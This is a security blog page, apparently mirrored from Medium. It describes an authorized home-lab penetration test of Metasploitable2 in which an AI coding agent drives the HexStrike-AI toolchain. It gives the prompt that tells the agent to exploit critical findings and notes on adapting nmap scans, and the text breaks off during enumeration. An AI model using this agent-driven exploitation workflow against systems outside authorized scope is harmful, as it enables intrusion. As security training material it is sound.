<!doctype html>
<html lang="en" dir="ltr" class="docs-wrapper plugin-docs plugin-id-default docs-version-current docs-doc-page docs-doc-id-labs/hexstrike-metasploitable-lab" data-has-hydrated="false">
<head>
<meta charset="UTF-8">
<meta name="generator" content="Docusaurus v3.10.1">
<title data-rh="true">HexStrike+OpenAI Codex. AI-Driven Exploitation of Metasploitable. | 1200km</title><meta data-rh="true" name="viewport" content="width=device-width,initial-scale=1"><meta data-rh="true" name="twitter:card" content="summary_large_image"><meta data-rh="true" property="og:image" content="https://1200km.com/medium-blog-navigation/img/favicon.svg"><meta data-rh="true" name="twitter:image" content="https://1200km.com/medium-blog-navigation/img/favicon.svg"><meta data-rh="true" property="og:url" content="https://1200km.com/medium-blog-navigation/docs/labs/hexstrike-metasploitable-lab"><meta data-rh="true" property="og:locale" content="en"><meta data-rh="true" name="docusaurus_locale" content="en"><meta data-rh="true" name="docsearch:language" content="en"><meta data-rh="true" name="docusaurus_version" content="current"><meta data-rh="true" name="docusaurus_tag" content="docs-default-current"><meta data-rh="true" name="docsearch:version" content="current"><meta data-rh="true" name="docsearch:docusaurus_tag" content="docs-default-current"><meta data-rh="true" property="og:title" content="HexStrike+OpenAI Codex. AI-Driven Exploitation of Metasploitable. | 1200km"><meta data-rh="true" name="description" content="How I Used an LLM-Orchestrated Toolchain to Enumerate and Exploit a Deliberately Vulnerable Host (With Real Proofs)"><meta data-rh="true" property="og:description" content="How I Used an LLM-Orchestrated Toolchain to Enumerate and Exploit a Deliberately Vulnerable Host (With Real Proofs)"><link data-rh="true" rel="icon" href="/medium-blog-navigation/img/favicon.svg"><link data-rh="true" rel="canonical" href="https://1200km.com/medium-blog-navigation/docs/labs/hexstrike-metasploitable-lab"><link data-rh="true" rel="alternate" href="https://1200km.com/medium-blog-navigation/docs/labs/hexstrike-metasploitable-lab" hreflang="en"><link data-rh="true" rel="alternate" href="https://1200km.com/medium-blog-navigation/docs/labs/hexstrike-metasploitable-lab" hreflang="x-default"><script data-rh="true" type="application/ld+json">{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"HexStrike+OpenAI Codex. AI-Driven Exploitation of Metasploitable.","item":"https://1200km.com/medium-blog-navigation/docs/labs/hexstrike-metasploitable-lab"}]}</script><link rel="preconnect" href="https://www.google-analytics.com">
<link rel="preconnect" href="https://www.googletagmanager.com">
<script async src="https://www.googletagmanager.com/gtag/js?id=G-TMTG21RVHM"></script>
<script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","G-TMTG21RVHM",{anonymize_ip:!0})</script>



<script src="https://1200km.com/assets/theme-bootstrap.js"></script>
<script src="https://1200km.com/assets/docusaurus-ecosystem.js?v=20260614-3" defer="defer"></script>
<script src="https://1200km.com/assets/site-theme.js?v=20260721-shell" defer="defer"></script><link rel="stylesheet" href="/medium-blog-navigation/assets/css/styles.c77d3a4e.css">
<script src="/medium-blog-navigation/assets/js/runtime~main.26ce5626.js" defer="defer"></script>
<script src="/medium-blog-navigation/assets/js/main.06f9a8d3.js" defer="defer"></script>
</head>
<body>
<svg style="display: none;"><defs>
<symbol id="theme-svg-external-link" viewBox="0 0 24 24"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"/></symbol>
</defs></svg>
<script>!function(){var t=function(){try{return new URLSearchParams(window.location.search).get("docusaurus-theme")}catch(t){}}()||function(){try{return window.localStorage.getItem("theme")}catch(t){}}();document.documentElement.setAttribute("data-theme",t||(window.matchMedia("(prefers-color-scheme: dark)").matches?"dark":"light")),document.documentElement.setAttribute("data-theme-choice",t||"system")}(),function(){try{const n=new URLSearchParams(window.location.search).entries();for(var[t,e]of n)if(t.startsWith("docusaurus-data-")){var a=t.replace("docusaurus-data-","data-");document.documentElement.setAttribute(a,e)}}catch(t){}}(),document.documentElement.setAttribute("data-announcement-bar-initially-dismissed",function(){try{return"true"===localStorage.getItem("docusaurus.announcement.dismiss")}catch(t){}return!1}())</script><div id="__docusaurus"><div role="region" aria-label="Skip to main content"><a class="skipToContent_fXgn" href="#__docusaurus_skipToContent_fallback">Skip to main content</a></div><div class="theme-announcement-bar announcementBar_mb4j" style="background-color:#0f62fe;color:#ffffff" role="banner"><div class="content_knG7 announcementBarContent_xLdY">The canonical article archive now lives at <a href="https://1200km.com/articles/">1200km.com/articles/</a>.</div></div><header class="site-header" data-site-shell="standalone" data-site-shell-version="2026-07-24.1"><a class="skip-link" href="#main-content">Skip to main content</a><nav class="nav" aria-label="Primary navigation"><a class="brand" href="/"><img src="/assets/ap-logo.png" alt="" width="36" height="36" loading="lazy" decoding="async"><span class="brand-copy"><strong>Andrey Pautov</strong><small>Security research</small></span></a><details class="nav-links" data-mobile-navigation="true"><summary class="nav-menu-toggle" aria-label="Open navigation" aria-controls="primary-nav-list"><span class="nav-menu-icon" aria-hidden="true"><span></span><span></span></span><span class="nav-menu-text">Menu</span></summary><div class="nav-list" id="primary-nav-list"><a href="/cti.html">Research</a><a class="active" aria-current="page" href="/guides.html">Library</a><a href="/projects.html">Products &amp; Labs</a><a class="nav-flagship" href="/adversarygraph/">AdversaryGraph</a><details class="nav-more"><summary>More</summary><div class="nav-more-list"><a href="/cyber-knowledge/">Cyber Knowledge</a><a href="/about.html">About</a><a href="/cv.html">CV</a><a href="/external-validation.html">External validation</a></div></details></div></details><div class="site-search-host site-search-host--standalone" data-site-search-theme="true" data-search-state="loading" role="search" aria-label="Site search"><a class="site-search-fallback" data-site-search-control="fallback" href="/search.html" aria-label="Search all 1200km research"><span aria-hidden="true" class="site-search-fallback-icon"></span><span class="site-search-fallback-text">Search research</span></a></div><button class="theme-btn" id="theme-btn" type="button" aria-label="Toggle theme" title="Toggle theme">☀</button></nav></header><div id="__docusaurus_skipToContent_fallback" class="theme-layout-main main-wrapper mainWrapper_z2l0"><div class="docsWrapper_hBAB"><button aria-label="Scroll back to top" class="clean-btn theme-back-to-top-button backToTopButton_sjWU" type="button"></button><div class="docRoot_UBD9"><aside class="theme-doc-sidebar-container docSidebarContainer_YfHR"><div class="sidebarViewport_aRkj"><div class="sidebar_njMd"><nav aria-label="Docs sidebar" class="menu thin-scrollbar menu_SIkG menuWithAnnouncementBar_GW3s"><ul class="theme-doc-sidebar-menu menu__list"><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-1 menu__list-item"><a class="menu__link" href="/medium-blog-navigation/docs/analysis"><span title="Blog Analysis" class="linkLabel_WmDU">Blog Analysis</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-1 menu__list-item"><a class="menu__link" href="/medium-blog-navigation/docs/reading-paths"><span title="Reading Paths" class="linkLabel_WmDU">Reading Paths</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-1 menu__list-item sidebar-all-articles-button"><a class="menu__link" href="/medium-blog-navigation/docs/articles/"><span title="All Articles" class="linkLabel_WmDU">All Articles</span></a></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist" href="/medium-blog-navigation/docs/articles/"><span title="Articles" class="categoryLinkLabel_W154">Articles</span></a><button aria-label="Expand sidebar category &#x27;Articles&#x27;" aria-expanded="false" type="button" class="clean-btn menu__caret"></button></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret menu__link--active" role="button" aria-expanded="true" href="/medium-blog-navigation/docs/labs/"><span title="Labs" class="categoryLinkLabel_W154">Labs</span></a></div><ul class="menu__list"><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/labs/"><span title="Labs and Deployment Guides" class="linkLabel_WmDU">Labs and Deployment Guides</span></a></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/medium-blog-navigation/docs/labs/llm-agent-attack-lab"><span title="AI Security" class="categoryLinkLabel_W154">AI Security</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret menu__link--active" role="button" aria-expanded="true" tabindex="0" href="/medium-blog-navigation/docs/labs/hackerai-metasploitable-lab"><span title="AI-Assisted Pentest" class="categoryLinkLabel_W154">AI-Assisted Pentest</span></a></div><ul class="menu__list"><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/labs/hackerai-metasploitable-lab"><span title="Enhancing Penetration Testing with HackerAI: Step-by-Step Guide (Metasploitable Lab)" class="linkLabel_WmDU">Enhancing Penetration Testing with HackerAI: Step-by-Step Guide (Metasploitable Lab)</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/labs/hexstrike-home-network-lab"><span title="AI-Driven Pentesting at Home: Using HexStrike-AI for Full Network Discovery and Exploitation" class="linkLabel_WmDU">AI-Driven Pentesting at Home: Using HexStrike-AI for Full Network Discovery and Exploitation</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link menu__link--active" aria-current="page" tabindex="0" href="/medium-blog-navigation/docs/labs/hexstrike-metasploitable-lab"><span title="HexStrike+OpenAI Codex. AI-Driven Exploitation of Metasploitable." class="linkLabel_WmDU">HexStrike+OpenAI Codex. AI-Driven Exploitation of Metasploitable.</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/labs/hexstrike-subnet-compromise-lab"><span title="HexStrike + Cursor (MCP): From Single Target → Full Subnet Compromise (Lab PT Walkthrough)" class="linkLabel_WmDU">HexStrike + Cursor (MCP): From Single Target → Full Subnet Compromise (Lab PT Walkthrough)</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/labs/hexstrike-webapp-pentest-lab"><span title="AI-Driven Web Application Pentesting with HexStrike-AI" class="linkLabel_WmDU">AI-Driven Web Application Pentesting with HexStrike-AI</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/labs/hexstrike-wireless-pentest-lab"><span title="AI-Driven Wireless Penetration Testing. One Promt WIFI cracking" class="linkLabel_WmDU">AI-Driven Wireless Penetration Testing. One Promt WIFI cracking</span></a></li></ul></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/medium-blog-navigation/docs/labs/active-directory-manual-lab"><span title="Active Directory" class="categoryLinkLabel_W154">Active Directory</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/medium-blog-navigation/docs/labs/operation-dragonrx-attack-playbook"><span title="CTI Emulation" class="categoryLinkLabel_W154">CTI Emulation</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/medium-blog-navigation/docs/labs/ai-web-cloud-pentest-lab"><span title="Cloud" class="categoryLinkLabel_W154">Cloud</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/medium-blog-navigation/docs/labs/black-box-kubernetes-pentest-playbook"><span title="Kubernetes" class="categoryLinkLabel_W154">Kubernetes</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/medium-blog-navigation/docs/labs/android-app-analysis-lab"><span title="Mobile Security" class="categoryLinkLabel_W154">Mobile Security</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/medium-blog-navigation/docs/labs/dockerized-ai-host-vulnerability-assessment"><span title="Tooling" class="categoryLinkLabel_W154">Tooling</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/medium-blog-navigation/docs/labs/vulnerable-iis-sharepoint-fluent-bit-lab"><span title="Vulnerable Infrastructure" class="categoryLinkLabel_W154">Vulnerable Infrastructure</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/medium-blog-navigation/docs/labs/safe-dvwa-ansible-lab"><span title="Vulnerable Web" class="categoryLinkLabel_W154">Vulnerable Web</span></a></div></li></ul></li></ul></nav></div></div></aside><main class="docMainContainer_TBSr"><div class="container padding-top--md padding-bottom--lg"><div class="row"><div class="col docItemCol_VOVn"><div class="docItemContainer_Djhp"><article><nav class="theme-doc-breadcrumbs breadcrumbsContainer_Z_bl" aria-label="Breadcrumbs"><ul class="breadcrumbs"><li class="breadcrumbs__item"><a aria-label="Home page" class="breadcrumbs__link" href="/medium-blog-navigation/"><svg viewBox="0 0 24 24" class="breadcrumbHomeIcon_YNFT"><path d="M10 19v-5h4v5c0 .55.45 1 1 1h3c.55 0 1-.45 1-1v-7h1.7c.46 0 .68-.57.33-.87L12.67 3.6c-.38-.34-.96-.34-1.34 0l-8.36 7.53c-.34.3-.13.87.33.87H5v7c0 .55.45 1 1 1h3c.55 0 1-.45 1-1z" fill="currentColor"></path></svg></a></li><li class="breadcrumbs__item"><span class="breadcrumbs__link">Labs</span></li><li class="breadcrumbs__item"><span class="breadcrumbs__link">AI-Assisted Pentest</span></li><li class="breadcrumbs__item breadcrumbs__item--active"><span class="breadcrumbs__link">HexStrike+OpenAI Codex. AI-Driven Exploitation of Metasploitable.</span></li></ul></nav><div class="tocCollapsible_ETCw theme-doc-toc-mobile tocMobile_ITEo"><button type="button" class="clean-btn tocCollapsibleButton_TO0P">On this page</button></div><div class="theme-doc-markdown markdown"><header><h1>HexStrike+OpenAI Codex. AI-Driven Exploitation of Metasploitable.</h1></header>
<div class="theme-admonition theme-admonition-info admonition_xJq3 alert alert--info"><div class="admonitionHeading_Gvgb"><span class="admonitionIcon_Rf37"><svg viewBox="0 0 14 16"><path fill-rule="evenodd" d="M7 2.3c3.14 0 5.7 2.56 5.7 5.7s-2.56 5.7-5.7 5.7A5.71 5.71 0 0 1 1.3 8c0-3.14 2.56-5.7 5.7-5.7zM7 1C3.14 1 0 4.14 0 8s3.14 7 7 7 7-3.14 7-7-3.14-7-7-7zm1 3H6v5h2V4zm0 6H6v2h2v-2z"></path></svg></span>Lab Metadata</div><div class="admonitionContent_BuS1"><ul>
<li class=""><strong>Category:</strong> AI-Assisted Pentest</li>
<li class=""><strong>Source article:</strong> <a href="https://medium.com/@1200km/hexstrike-openai-codex-ai-driven-exploitation-of-metasploitable-b892c07be39f" target="_blank" rel="noopener noreferrer" class="">https://medium.com/@1200km/hexstrike-openai-codex-ai-driven-exploitation-of-metasploitable-b892c07be39f</a></li>
<li class=""><strong>Published:</strong> 2026-01-03</li>
<li class=""><strong>Repository:</strong> <a href="https://github.com/anpa1200/Hexstrike-AI-guide" target="_blank" rel="noopener noreferrer" class="">https://github.com/anpa1200/Hexstrike-AI-guide</a></li>
<li class=""><strong>Preserved media:</strong> 8 article image(s), including screenshots and infographics where present.</li>
<li class=""><strong>Preserved technical blocks:</strong> 8 code/configuration block(s).</li>
</ul></div></div>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="ecosystem-fit">Ecosystem Fit<a href="#ecosystem-fit" class="hash-link" aria-label="Direct link to Ecosystem Fit" title="Direct link to Ecosystem Fit" translate="no">​</a></h2>
<p>This page mirrors the original Medium lab content into the 1200km knowledge base so it remains available inside the <code>1200km.com</code> documentation ecosystem. Use the linked repository when one exists; otherwise use the deployment commands and configuration blocks preserved below as the lab source of truth.</p>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="deployment-requirements">Deployment Requirements<a href="#deployment-requirements" class="hash-link" aria-label="Direct link to Deployment Requirements" title="Direct link to Deployment Requirements" translate="no">​</a></h2>
<p>The full prerequisites, deployment flow, validation commands, screenshots, and operational notes are preserved from the article below. Review the repository metadata above first, then follow the article sections in order.</p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="how-i-used-an-llm-orchestrated-toolchain-to-enumerate-and-exploit-a-deliberately-vulnerable-host-with-real-proofs">How I Used an LLM-Orchestrated Toolchain to Enumerate and Exploit a Deliberately Vulnerable Host (With Real Proofs)<a href="#how-i-used-an-llm-orchestrated-toolchain-to-enumerate-and-exploit-a-deliberately-vulnerable-host-with-real-proofs" class="hash-link" aria-label="Direct link to How I Used an LLM-Orchestrated Toolchain to Enumerate and Exploit a Deliberately Vulnerable Host (With Real Proofs)" title="Direct link to How I Used an LLM-Orchestrated Toolchain to Enumerate and Exploit a Deliberately Vulnerable Host (With Real Proofs)" translate="no">​</a></h3>
<p><img decoding="async" loading="lazy" src="https://cdn-images-1.medium.com/max/800/1*ryG5h9VfySviXapLEyOSvg.png" alt="Article screenshot" class="img_ev3q"></p>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="introduction">Introduction<a href="#introduction" class="hash-link" aria-label="Direct link to Introduction" title="Direct link to Introduction" translate="no">​</a></h2>
<p>AI-assisted penetration testing is no longer a concept — it is operational reality.</p>
<p>In this article, I walk through a<strong>real, authorized</strong>penetration test against my own lab host running<strong>Metasploitable2</strong>. I used an LLM-driven workflow (Codex CLI) orchestrating tool execution through<strong>HexStrike-AI</strong>to perform:</p>
<ul>
<li class="">
<p>network discovery</p>
</li>
<li class="">
<p>enumeration and service fingerprinting</p>
</li>
<li class="">
<p>exploit selection and execution</p>
</li>
<li class="">
<p>proof collection (root-level command output)</p>
</li>
</ul>
<p>This was not a simulation.</p>
<p>Real tools were executed.
Real vulnerabilities were validated.
And the target was compromised with<strong>unauthenticated root access</strong>— twice — via two independent attack paths.</p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="core-guides-and-setup">Core Guides and Setup<a href="#core-guides-and-setup" class="hash-link" aria-label="Direct link to Core Guides and Setup" title="Direct link to Core Guides and Setup" translate="no">​</a></h3>
<p><a class="" href="/medium-blog-navigation/docs/articles/2025/2025-12-18-hexstrike-ai-install-configure-and-run-mcp-with-gemini-openai-cursor-llama-85a0e5752949"><strong>HexStrike on Kali Linux 2025.4: A Comprehensive Guide</strong></a></p>
<ul>
<li class=""><em>Focus: Initial setup and overview of the AI-powered offensive security framework.</em></li>
</ul>
<p><a class="" href="/medium-blog-navigation/docs/articles/2025/2025-12-25-hexstrike-ai-a-force-multiplier-for-red-teams-and-a-dangerous-shift-in-the-threat-landscap-3e1d4e86f3ae"><strong>HexStrike-AI: A Force Multiplier for Red Teams — and a Dangerous Shift in the Threat Landscape</strong></a></p>
<ul>
<li class=""><em>Focus: Analysis of AI-orchestrated pentesting and its implications.</em></li>
</ul>
<p><a class="" href="/medium-blog-navigation/docs/articles/2025/2025-12-31-hexstrike-mcp-orchestration-with-ollama-ubuntu-host-kali-vm-ssh-bridging-and-performance-f049ab140596"><strong>HexStrike MCP Orchestration with Ollama: Ubuntu Host, Kali VM, SSH Bridging, and Performance…</strong></a></p>
<ul>
<li class=""><em>Focus: Technical architecture using Model Context Protocol (MCP) and local LLMs.</em></li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="practical-applications--lab-comparisons">Practical Applications &amp; Lab Comparisons<a href="#practical-applications--lab-comparisons" class="hash-link" aria-label="Direct link to Practical Applications &amp; Lab Comparisons" title="Direct link to Practical Applications &amp; Lab Comparisons" translate="no">​</a></h3>
<p><a class="" href="/medium-blog-navigation/docs/articles/2025/2025-12-26-hexstrike-gemini-vs-hackerai-ops-copilot-vs-chatbot-with-tools-1d799845410b"><strong>HexStrike + Gemini vs. HackerAI: “Ops Copilot” vs. “Chatbot with Tools”</strong></a></p>
<ul>
<li class=""><em>Focus: Practical lab comparison of orchestration quality between different AI security tools.</em></li>
</ul>
<p><a class="" href="/medium-blog-navigation/docs/articles/2025/2025-12-21-ai-driven-pentesting-at-home-using-hexstrike-ai-for-full-network-discovery-and-exploitatio-00a9e88b3bde"><strong>AI-Driven Pentesting at Home: Using HexStrike-AI for Full Network Discovery and Exploitation</strong></a></p>
<ul>
<li class=""><em>Focus: Step-by-step home lab application for network enumeration.</em></li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="specific-tooling--technique-guides">Specific Tooling &amp; Technique Guides<a href="#specific-tooling--technique-guides" class="hash-link" aria-label="Direct link to Specific Tooling &amp; Technique Guides" title="Direct link to Specific Tooling &amp; Technique Guides" translate="no">​</a></h3>
<ul>
<li class="">
<p><a class="" href="/medium-blog-navigation/docs/articles/2025/2025-12-22-ai-driven-web-application-pentesting-with-hexstrike-ai-67f3dae32040"><strong>AI-Driven Web Application Pentesting with HexStrike-AI</strong></a></p>
</li>
<li class="">
<p><a class="" href="/medium-blog-navigation/docs/articles/2025/2025-12-23-integrating-shodan-with-hexstrike-ai-using-gemini-cli-b6f9fcbe8e6e"><strong>Integrating Shodan with HexStrike-AI Using Gemini-CLI</strong></a></p>
</li>
<li class="">
<p><a class="" href="/medium-blog-navigation/docs/articles/2025/2025-12-24-ai-driven-wireless-penetration-testing-one-promt-wifi-cracking-6477c06f6af4"><strong>AI-Driven Wireless Penetration Testing. One Prompt WIFI cracking</strong></a>(Using HexStrike-AI)</p>
</li>
<li class="">
<p><a class="" href="/medium-blog-navigation/docs/articles/2025/2025-12-29-ai-driven-office-documents-password-recovery-with-hexstrike-ai-and-gemini-cli-3c8bb7deb82d"><strong>AI-Driven Office Documents Password Recovery with HexStrike-AI and Gemini-CLI</strong></a></p>
</li>
<li class="">
<p><a class="" href="/medium-blog-navigation/docs/articles/2025/2025-12-29-ai-driven-pdf-password-recovery-with-hexstrike-ai-and-gemini-cli-cfa7eb0fae91"><strong>AI-Driven PDF Password Recovery with HexStrike-AI and Gemini-CLI</strong></a></p>
</li>
<li class="">
<p><a class="" href="/medium-blog-navigation/docs/articles/2025/2025-12-25-ai-driven-zip-password-recovery-with-hexstrike-ai-and-gemini-cli-b8fc5c475ebc"><strong>AI-Driven ZIP Password Recovery with HexStrike-AI and Gemini-CLI</strong></a></p>
</li>
</ul>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="what-is-hexstrike-ai">What Is HexStrike-AI?<a href="#what-is-hexstrike-ai" class="hash-link" aria-label="Direct link to What Is HexStrike-AI?" title="Direct link to What Is HexStrike-AI?" translate="no">​</a></h2>
<p>HexStrike-AI is not “another scanner.”</p>
<p>It is an orchestration layer that lets an LLM:</p>
<ul>
<li class="">
<p>decide what security tools to run</p>
</li>
<li class="">
<p>execute them locally (or via SSH/MCP)</p>
</li>
<li class="">
<p>interpret outputs</p>
</li>
<li class="">
<p>adapt strategy dynamically (timeouts, missing tools, privilege constraints)</p>
</li>
<li class="">
<p>optionally run controlled exploitation with PoC evidence</p>
</li>
</ul>
<p>In short:</p>
<p><strong>The AI plans. HexStrike executes. Kali delivers the tools.</strong></p>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="test-scope--authorization">Test Scope &amp; Authorization<a href="#test-scope--authorization" class="hash-link" aria-label="Direct link to Test Scope &amp; Authorization" title="Direct link to Test Scope &amp; Authorization" translate="no">​</a></h2>
<p>This assessment was conducted under explicit authorization.</p>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="scope">Scope<a href="#scope" class="hash-link" aria-label="Direct link to Scope" title="Direct link to Scope" translate="no">​</a></h2>
<ul>
<li class="">
<p><strong>Target:</strong><code>172.16.163.129</code></p>
</li>
<li class="">
<p>**Environment:**private home lab (Metasploitable2 VM)</p>
</li>
<li class="">
<p>**Attacker:**Kali Linux environment with Codex CLI + HexStrike MCP</p>
</li>
</ul>
<p><img decoding="async" loading="lazy" src="https://cdn-images-1.medium.com/max/800/1*2tkO21QPoKIaAHV2GLTiXg.png" alt="Article screenshot" class="img_ev3q"></p>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="the-prompt-that-started-everything">The Prompt That Started Everything<a href="#the-prompt-that-started-everything" class="hash-link" aria-label="Direct link to The Prompt That Started Everything" title="Direct link to The Prompt That Started Everything" translate="no">​</a></h2>
<p>This is the “pattern” that makes LLM-driven pentesting actually work: you must demand<strong>execution + evidence</strong>.</p>
<p>Example prompt structure (adapt it to your CLI):</p>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><div class="token-line" style="color:#393A34"><span class="token plain">Use the MCP server </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">&quot;hexstrike&quot;</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">: Authorized pentest of </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">172.16</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">.163</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">.129</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">Full service discovery</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">Enumerate versions</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">Identify </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">vulnerabilities</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">(by severity)</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">Exploit critical findings</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">Provide </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">proofs</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">(command output)</span><br></div></code></pre></div></div>
<p>Key lesson:
<strong>If you want HexStrike to run tools, explicitly require tool execution and proof artifacts.</strong></p>
<p><img decoding="async" loading="lazy" src="https://cdn-images-1.medium.com/max/800/1*eABegFDYfVOV0X7OTkDnxA.png" alt="Article screenshot" class="img_ev3q"></p>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="phase-1-reachability-and-discovery">Phase 1: Reachability and Discovery<a href="#phase-1-reachability-and-discovery" class="hash-link" aria-label="Direct link to Phase 1: Reachability and Discovery" title="Direct link to Phase 1: Reachability and Discovery" translate="no">​</a></h2>
<p>The first attempt targeted a wrong IP (<code>172.16.59.129</code>) and resulted in “host seems down.”</p>
<p>After correcting to:</p>
<ul>
<li class=""><code>172.16.163.129</code></li>
</ul>
<p>The host responded immediately.</p>
<p>A fast top-ports discovery scan confirmed the target was up and exposed a broad attack surface.</p>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="phase-2-enumeration--service-fingerprinting">Phase 2: Enumeration &amp; Service Fingerprinting<a href="#phase-2-enumeration--service-fingerprinting" class="hash-link" aria-label="Direct link to Phase 2: Enumeration &amp; Service Fingerprinting" title="Direct link to Phase 2: Enumeration &amp; Service Fingerprinting" translate="no">​</a></h2>
<p>Because the environment had constraints (root privileges not always available, tool timeouts), the workflow adapted:</p>
<ul>
<li class="">
<p>switched from SYN scan (<code>-sS</code>) to TCP connect (<code>-sT</code>)</p>
</li>
<li class="">
<p>used bounded host timeouts</p>
</li>
<li class="">
<p>reduced version intensity when needed</p>
</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="confirmed-exposed-services-high-level">Confirmed exposed services (high-level)<a href="#confirmed-exposed-services-high-level" class="hash-link" aria-label="Direct link to Confirmed exposed services (high-level)" title="Direct link to Confirmed exposed services (high-level)" translate="no">​</a></h3>
<p>The target exposed multiple legacy services typical of Metasploitable2:</p>
<ul>
<li class="">
